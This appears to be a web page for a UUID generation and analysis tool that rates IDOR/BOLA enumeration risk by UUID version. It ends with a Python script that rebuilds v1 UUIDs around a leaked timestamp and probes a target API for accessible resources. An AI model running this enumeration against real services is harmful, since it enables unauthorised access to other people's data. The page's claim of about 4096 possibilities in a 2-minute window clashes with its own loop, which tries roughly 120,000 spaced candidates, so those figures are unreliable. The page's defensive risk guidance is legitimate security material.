$loading...
Generate UUID v4, v1, v5, and v7 in bulk. Analyze existing UUIDs to extract timestamps, detect version, and assess IDOR/BOLA vulnerability risk.
UUID Version
HIGH: v1 / v6 / v7 — Sequential / time-based
Predictable. Attacker can enumerate by incrementing the timestamp component. Within a 2-minute window, v1 has only ~4096 possible values per node.
LOW: v4 — Random
122 bits of cryptographic randomness. Brute force requires ~2^61 guesses to reach 50% probability — computationally infeasible.
HIGH: Nil UUID (all zeros)
00000000-0000-0000-0000-000000000000 is often used as a default or test value. Applications may grant unintended access.
HIGH: Sequential integers formatted as UUIDs
e.g. 00000000-0000-0000-0000-000000000001 — trivially enumerable with a simple loop.
Brute-forcing v1 UUIDs (2-minute window, ~4096 possibilities):
# Known v1 UUID leaked at approx timestamp T
# Enumerate ±1 minute around T (100ns tick resolution)
import uuid, requests
BASE_URL = "https://target.com/api/resource/"
# Extract 60-bit timestamp from known UUID
known = uuid.UUID("xxxxxxxx-xxxx-1xxx-xxxx-xxxxxxxxxxxx")
t = known.time # 100-nanosecond intervals since 1582-10-15
for delta in range(-600_000_000, 600_000_000, 10000):
candidate_time = t + delta
# Reconstruct UUID with modified timestamp
time_low = candidate_time & 0xFFFFFFFF
time_mid = (candidate_time >> 32) & 0xFFFF
time_hi = (candidate_time >> 48) & 0x0FFF
candidate = f"{time_low:08x}-{time_mid:04x}-1{time_hi:03x}-{known.clock_seq_hi_variant:02x}{known.clock_seq_low:02x}-{known.node:012x}"
r = requests.get(BASE_URL + candidate)
if r.status_code == 200:
print(f"[+] Found: {candidate}")